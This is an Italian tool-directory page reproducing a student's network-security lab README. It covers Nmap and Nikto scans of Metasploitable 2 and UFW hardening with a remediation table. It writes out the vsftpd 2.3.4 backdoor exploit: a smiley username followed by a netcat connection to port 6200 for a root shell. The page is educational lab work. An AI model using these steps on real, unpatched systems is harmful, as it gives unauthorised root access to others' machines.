Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/amirmuhammadmarvi/network-security-lab
RicognizioneScanner di VulnerabilitàAnalisi delle VulnerabilitàExploitAudit di ConfigurazioneSicurezza WebSicurezza di RetePenetration TestingApprendimento e Formazione

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
network-security-lab — Laboratorio virtuale controllato di attacco e difesa — sfruttamento di CVE-2011-2523, ricognizione Nmap, scansione Nikto, rafforzamento UFW su Metasploitable 2 | Kitploit
Lab e Pratica
GitHubamirmuhammadmarvi/network-security-lab

network-security-lab

Laboratorio virtuale controllato di attacco e difesa — sfruttamento di CVE-2011-2523, ricognizione Nmap, scansione Nikto, rafforzamento UFW su Metasploitable 2

Vedi Repository
2 mesi faNon ancora revisionato
Condividi

🔬 Laboratorio di Sicurezza di Rete

Un ambiente virtuale controllato che simula scenari reali di attacco e difesa

Python Platform CVE Status


📋 Panoramica

Questo laboratorio simula un test di penetrazione reale e un esercizio di rafforzamento difensivo in un ambiente virtuale completamente isolato. Dimostra l'intero ciclo di vita della sicurezza offensiva — dalla ricognizione allo sfruttamento — e i controlli difensivi che mitigherebbero ogni rischio.

Risultato chiave: Ottenuto accesso completo come root alla macchina target in meno di 60 secondi sfruttando un backdoor noto, senza credenziali e senza strumenti speciali.


🏗 Ambiente di Laboratorio


🎯 Metodologia

root@kitploit:~
Ricognizione  →  Scansione  →  Sfruttamento  →  Difesa e Rafforzamento

🔍 Fase 1 — Ricognizione

Scansione delle Porte con Nmap

root@kitploit:~
sudo nmap -sV -O 192.168.148.130 -oN scan_before.txt

Risultati chiave — 23 porte aperte in totale:

Scansione Web con Nikto

root@kitploit:~
nikto -h http://192.168.148.130 -o nikto_before.txt

18 vulnerabilità trovate, tra cui:

  • phpMyAdmin esposto pubblicamente
  • phpinfo.php perde la configurazione completa del server
  • HTTP TRACE abilitato (attacchi XST)
  • Indicizzazione directory abilitata su /doc/, /test/
  • Apache 2.2.8 e PHP 5.2.4 obsoleti

💥 Fase 2 — Sfruttamento

CVE-2011-2523 — Backdoor vsftpd 2.3.4

vsftpd 2.3.4 contiene un backdoor introdotto tramite un compromesso della supply chain. Inviando un nome utente che termina con :) fa sì che il server apra una shell root sulla porta 6200.

root@kitploit:~
# Step 1 — Attivare il backdoor tramite FTP
ftp 192.168.148.130
# Username: backdoor:)   Password: anything

# Step 2 — Collegarsi alla shell generata
nc 192.168.148.130 6200

# Step 3 — Verificare l'accesso
whoami
# → root

Risultato: Accesso completo come root al sistema ottenuto in < 60 secondi — nessuna credenziale, nessun framework di sfruttamento richiesto.

Impatto: Un attaccante con accesso root può leggere/modificare/eliminare qualsiasi file, installare malware, esfiltrare dati, o spostarsi verso altri host sulla rete.


🛡 Fase 3 — Difesa e Rafforzamento

Firewall UFW — Politica di Rifiuto Predefinita

root@kitploit:~
sudo ufw enable
sudo ufw default deny incoming
sudo ufw default allow outgoing
sudo ufw allow 22/tcp    # Solo SSH
sudo ufw status verbose

Rimedi Raccomandati


📄 Rapporto Completo

Vedi report.md per la valutazione completa — metodologia completa, output dei comandi, tabella dei risultati, passaggi di sfruttamento e tutte le raccomandazioni di rimedio.


⚠️ Disclaimer Legale

Questo laboratorio è stato condotto in un ambiente virtuale completamente isolato utilizzando software intenzionalmente vulnerabile (Metasploitable 2). Tutte le tecniche sono solo per scopi educativi e di portfolio. Non replicare su sistemi di cui non si possiede o per cui non si ha esplicita autorizzazione scritta per il test.


🛠 Strumenti Utilizzati


Autore: Amir Mohammad Marwi

Portfolio LinkedIn GitHub

Scarica lo strumento
ComponenteDettagli
HypervisorVMware Workstation
ReteHost-Only / NAT (completamente isolato)
Sistema Operativo AttaccanteUbuntu 24 LTS
Sistema Operativo TargetMetasploitable 2 (Linux 2.6.x)
IP Attaccante192.168.148.255
IP Target192.168.148.130
PortaServizioVersioneRischio
21FTPvsftpd 2.3.4🔴 CRITICO — Backdoor noto (CVE-2011-2523)
22SSHOpenSSH 4.7p1🟡 MEDIO — Obsoleto
23TelnetLinux telnetd🟠 ALTO — Protocollo in chiaro
80HTTPApache 2.2.8🟠 ALTO — Multiple CVE
1524BindshellShell root🔴 CRITICO — Shell root aperta
3306MySQL5.0.51a🟠 ALTO — Database esposto
5900VNCProtocollo 3.3🟠 ALTO — Autenticazione debole
6667IRCUnrealIRCd🔴 CRITICO — Backdoor noto
VulnerabilitàRimedio
Backdoor vsftpd 2.3.4Aggiornare a vsftpd 3.x o migrare a SFTP
Shell root aperta (porta 1524)Disabilitare immediatamente, verificare l'installazione
Telnet (porta 23)Disabilitare — imporre solo SSH
phpMyAdmin espostoLimitare per IP, richiedere autenticazione forte
MySQL esposto (porta 3306)Vincolare a localhost, bloccare accesso esterno
VNC esposto (porta 5900)Limitare per IP o disabilitare
Indicizzazione directoryApache: Options -Indexes
HTTP TRACEApache: TraceEnable off
Apache + PHP obsoletiAggiornare a versioni LTS supportate
StrumentoScopo
NmapScansione delle porte e rilevamento servizi
NiktoScansione vulnerabilità web
NetcatConnessione alla shell backdoor
UFWConfigurazione firewall basato su host
Client FTPAttivazione del backdoor vsftpd
VMware WorkstationVirtualizzazione laboratorio